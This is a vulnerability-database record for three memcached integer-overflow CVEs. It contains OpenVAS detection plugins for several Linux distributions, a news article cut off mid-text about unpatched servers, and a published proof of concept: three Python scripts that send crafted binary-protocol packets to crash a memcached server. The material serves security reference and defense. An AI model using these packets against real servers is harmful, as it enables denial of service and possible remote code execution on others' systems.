if(!isnull(res = isrpmvuln(pkg:\"memcached\", rpm:\"memcached~1.4.15~10.1.h2\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2016-11-24T00:00:00", "id": "OPENVAS:1361412562310871721", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871721", "type": "openvas", "title": "RedHat Update for memcached RHSA-2016:2819-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for memcached RHSA-2016:2819-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871721\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-24 05:39:30 +0100 (Thu, 24 Nov 2016)\");\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for memcached RHSA-2016:2819-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'memcached'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"memcached is a high-performance,\ndistributed memory object caching system, generic in nature, but intended for\nuse in speeding up dynamic web applications by alleviating database load.\n\nSecurity Fix(es):\n\n * Two integer overflow flaws, leading to heap-based buffer overflows, were\nfound in the memcached binary protocol. An attacker could create a\nspecially crafted message that would cause the memcached server to crash\nor, potentially, execute arbitrary code. (CVE-2016-8704, CVE-2016-8705)\n\n * An integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in memcached's parsing of SASL authentication messages. An attacker\ncould create a specially crafted message that would cause the memcached\nserver to crash or, potentially, execute arbitrary code. (CVE-2016-8706)\");\n script_tag(name:\"affected\", value:\"memcached on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:2819-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-November/msg00081.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"memcached\", rpm:\"memcached~1.4.15~10.el7_3.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"memcached-debuginfo\", rpm:\"memcached-debuginfo~1.4.15~10.el7_3.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-08T00:00:00", "id": "OPENVAS:1361412562310872102", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872102", "type": "openvas", "title": "Fedora Update for memcached FEDORA-2016-0c4e822340", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for memcached FEDORA-2016-0c4e822340\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872102\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-08 09:37:31 +0100 (Thu, 08 Dec 2016)\");\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for memcached FEDORA-2016-0c4e822340\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'memcached'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"memcached on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-0c4e822340\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OHVMADUSZTZ5AEK42ATRNAM5BESQKZ4W\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"memcached\", rpm:\"memcached~1.4.33~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "Multiple integer overflow vulnerabilities exist within Memcached that\n could be exploited to achieve remote code execution on the targeted system.", "modified": "2018-11-15T00:00:00", "published": "2016-11-02T00:00:00", "id": "OPENVAS:1361412562310140042", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140042", "type": "openvas", "title": "Memcached < 1.4.33 Multiple Remote Code Execution Vulnerabilities", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_memcached_1_4_33.nasl 12363 2018-11-15 09:51:15Z asteins $\n#\n# Memcached < 1.4.33 Multiple Remote Code Execution Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:memcached:memcached\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140042\");\n script_version(\"$Revision: 12363 $\");\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-15 10:51:15 +0100 (Thu, 15 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-02 14:57:47 +0100 (Wed, 02 Nov 2016)\");\n script_name(\"Memcached < 1.4.33 Multiple Remote Code Execution Vulnerabilities\");\n script_xref(name:\"URL\", value:\"https://github.com/memcached/memcached/wiki/ReleaseNotes1433\");\n script_xref(name:\"URL\", value:\"http://blog.talosintel.com/2016/10/memcached-vulnerabilities.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_memcached_detect.nasl\");\n script_mandatory_keys(\"Memcached/detected\");\n\n script_tag(name:\"affected\", value:\"Memcached < 1.4.33\");\n\n script_tag(name:\"insight\", value:\"These vulnerabilities manifest in various Memcached functions that are\n used in inserting, appending, prepending, or modifying key-value data pairs. Systems which also have\n Memcached compiled with support for SASL authentication are also vulnerable to a third flaw due to how\n Memcached handles SASL authentication commands.\");\n\n script_tag(name:\"solution\", value:\"Update to Memcached 1.4.33 or newer.\");\n\n script_tag(name:\"summary\", value:\"Multiple integer overflow vulnerabilities exist within Memcached that\n could be exploited to achieve remote code execution on the targeted system.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_proto( cpe:CPE, port:port ) ) exit( 0 );\n\nvers = infos[\"version\"];\nproto = infos[\"proto\"];\n\nif( version_is_less( version:vers, test_version:\"1.4.33\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"1.4.33\" );\n security_message( port:port, proto:proto, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-11-08T00:00:00", "id": "OPENVAS:1361412562310842939", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842939", "type": "openvas", "title": "Ubuntu Update for memcached USN-3120-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for memcached USN-3120-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842939\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-08 15:52:55 +0530 (Tue, 08 Nov 2016)\");\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for memcached USN-3120-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'memcached'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Aleksandar Nikolic discovered that Memcached\n incorrectly handled certain malformed commands. A remote attacker could use\n this issue to cause Memcached to crash, resulting in a denial of service, or\n possibly execute arbitrary code.\");\n script_tag(name:\"affected\", value:\"memcached on Ubuntu 16.04 LTS,\n Ubuntu 16.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3120-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3120-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|16\\.04 LTS|16\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"memcached\", ver:\"1.4.14-0ubuntu9.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"memcached\", ver:\"1.4.13-0ubuntu2.2\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"memcached\", ver:\"1.4.25-2ubuntu1.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"memcached\", ver:\"1.4.25-2ubuntu2.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-02T00:00:00", "id": "OPENVAS:1361412562310810180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810180", "type": "openvas", "title": "Fedora Update for memcached FEDORA-2016-66c70cadb4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for memcached FEDORA-2016-66c70cadb4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810180\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-02 14:06:58 +0100 (Fri, 02 Dec 2016)\");\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for memcached FEDORA-2016-66c70cadb4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'memcached'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"memcached on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-66c70cadb4\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ABVDYRA2YRJLUD7FAM67FCITWE6SEJ5I\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"memcached\", rpm:\"memcached~1.4.25~2.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-02T00:00:00", "id": "OPENVAS:1361412562310810158", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810158", "type": "openvas", "title": "Fedora Update for memcached FEDORA-2016-4df986a71f", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for memcached FEDORA-2016-4df986a71f\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810158\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-02 14:06:52 +0100 (Fri, 02 Dec 2016)\");\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for memcached FEDORA-2016-4df986a71f\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'memcached'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"memcached on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-4df986a71f\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YOES3I7XILLXQDJSJ4YIUXUO4K46OOTD\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"memcached\", rpm:\"memcached~1.4.17~5.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:22", "description": "", "published": "2016-11-03T00:00:00", "type": "packetstorm", "title": "Memcached 1.4.33 Proof Of Concept", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "modified": "2016-11-03T00:00:00", "id": "PACKETSTORM:139572", "href": "https://packetstormsecurity.com/files/139572/Memcached-1.4.33-Proof-Of-Concept.html", "sourceData": "`# Source: http://paper.seebug.org/95/ \n \nimport struct \nimport socket \nimport sys \n \nMEMCACHED_REQUEST_MAGIC = \"\\x80\" \nOPCODE_PREPEND_Q = \"\\x1a\" \nkey_len = struct.pack(\"!H\",0xfa) \nextra_len = \"\\x00\" \ndata_type = \"\\x00\" \nvbucket = \"\\x00\\x00\" \nbody_len = struct.pack(\"!I\",0) \nopaque = struct.pack(\"!I\",0) \nCAS = struct.pack(\"!Q\",0) \nbody = \"A\"*1024 \n \nif len(sys.argv) != 3: \nprint \"./poc_crash.py <server> <port>\" \n \npacket = MEMCACHED_REQUEST_MAGIC + OPCODE_PREPEND_Q + key_len + extra_len \npacket += data_type + vbucket + body_len + opaque + CAS \npacket += body \n \nset_packet = \"set testkey 0 60 4\\r\\ntest\\r\\n\" \nget_packet = \"get testkey\\r\\n\" \n \ns1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns1.connect((sys.argv[1],int(sys.argv[2]))) \ns1.sendall(set_packet) \nprint s1.recv(1024) \ns1.close() \n \n \ns2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns2.connect((sys.argv[1],int(sys.argv[2]))) \ns2.sendall(packet) \nprint s2.recv(1024) \ns2.close() \n \ns3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns3.connect((sys.argv[1],int(sys.argv[2]))) \ns3.sendall(get_packet) \ns3.recv(1024) \ns3.close() \n \n \n========= \n \nimport struct \nimport socket \nimport sys \n \n \nMEMCACHED_REQUEST_MAGIC = \"\\x80\" \nOPCODE_ADD = \"\\x02\" \nkey_len = struct.pack(\"!H\",0xfa) \nextra_len = \"\\x08\" \ndata_type = \"\\x00\" \nvbucket = \"\\x00\\x00\" \nbody_len = struct.pack(\"!I\",0xffffffd0) \nopaque = struct.pack(\"!I\",0) \nCAS = struct.pack(\"!Q\",0) \nextras_flags = 0xdeadbeef \nextras_expiry = struct.pack(\"!I\",0xe10) \nbody = \"A\"*1024 \n \npacket = MEMCACHED_REQUEST_MAGIC + OPCODE_ADD + key_len + extra_len \npacket += data_type + vbucket + body_len + opaque + CAS \npacket += body \nif len(sys.argv) != 3: \nprint \"./poc_add.py <server> <port>\" \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect((sys.argv[1],int(sys.argv[2]))) \ns.sendall(packet) \nprint s.recv(1024) \ns.close() \n \n========= \n \nimport struct \nimport socket \nimport sys \n \n \nMEMCACHED_REQUEST_MAGIC = \"\\x80\" \nOPCODE_SET = \"\\x21\" \nkey_len = struct.pack(\"!H\",32) \nbody_len = struct.pack(\"!I\",1) \npacket = MEMCACHED_REQUEST_MAGIC + OPCODE_SET + key_len + body_len*2 + \"A\"*1000 \nif len(sys.argv) != 3: \nprint \"./poc_sasl.py <server> <ip>\" \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect((sys.argv[1],int(sys.argv[2]))) \ns.sendall(packet) \nprint s.recv(1024) \ns.close() \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/139572/memcache-poc.txt"}], "thn": [{"lastseen": "2018-01-27T10:06:58", "bulletinFamily": "info", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "[](<https://3.bp.blogspot.com/-WfDOuFmgJLo/WW4pkRfGFkI/AAAAAAAAtqQ/rNakdiVULsgnWngXlDAj0e0RfkdcvZDdQCLcBGAs/s1600/memcached-vulnerabilities.png>)\n\nNothing in this world is fully secure, from our borders to cyberspace. I know vulnerabilities are bad, but the worst part comes in when people just don't care to apply patches on time. \n \nLate last year, Cisco's Talos intelligence and research group discovered [three critical remote code execution](<https://thehackernews.com/2016/11/memcached-hacking.html>) (RCE) vulnerabilities in Memcached that exposed major websites including Facebook, Twitter, YouTube, Reddit, to hackers. \n \nMemcached is a popular open-source and easily deployable distributed caching system that allows objects to be stored in memory. \n \nThe Memcached application has been designed to speed up dynamic web applications (_for example php-based websites)_ by reducing stress on the database that helps administrators to increase performance and scale web applications. \n \nIt's been almost eight months since the Memcached developers have released patches for three critical RCE vulnerabilities (CVE-2016-8704, CVE-2016-8705 and CVE-2016-8706) but tens of thousands of servers running Memcached application are still vulnerable, allowing attackers to steal sensitive data remotely. \n \nResearchers at Talos [conducted](<http://blog.talosintelligence.com/2017/07/memcached-patch-failure.html>) Internet scans on two different occasions, one in late February and another in July, to find out how many servers are still running the vulnerable version of the Memcached application. \n \nAnd the results are surprising... \n \n\n\n**_Results from February Scan:_**\n\n \n \n\n\n * Total servers exposed on the Internet \u2014 107,786\n * Servers still vulnerable \u2014 85,121\n * Servers still vulnerable but require authentication \u2014 23,707\n \n \nAnd the top 5 countries with most vulnerable servers are the United States, followed by China, United Kingdom, France and Germany. \n \n\n\n**_Results from July Scan:_**\n\n \n \n\n\n * Total servers exposed on the Internet \u2014 106,001\n * servers still vulnerable \u2014 73,403\n * Servers still vulnerable but require authentication \u2014 18,012\n \n \nAfter comparing results from both the Internet scans, researchers learned that only 2,958 servers found vulnerable in February scan had been patched before July scan, while the remaining are still left vulnerable to the remote hack. \n \n\n\n### Data Breach & Ransom Threats\n\n \nThis ignorance by organisations to apply patches on time is concerning, as Talos researchers warned that these vulnerable Memcached installations could be an easy target of [ransomware attacks](<https://thehackernews.com/2017/01/secure-mongodb-database.html>) similar to the one that hit [MongoDB databases](<https://thehackernews.com/2017/01/mongodb-database-security.html>) in late December. \n \nAlthough unlike MongoDB, Memcached is not a database, it \"_can still contain sensitive information and disruption in the service availability would certainly lead to further disruptions on dependent services._\" \n \nThe flaws in Memcached could allow hackers to replace cached content with their malicious one to deface the website, serve phishing pages, ransom threats, and malicious links to hijack victim's machine, placing hundreds of millions of online users at risk. \n \n\n\n> \"With the recent spate of worm attacks leveraging vulnerabilities this should be 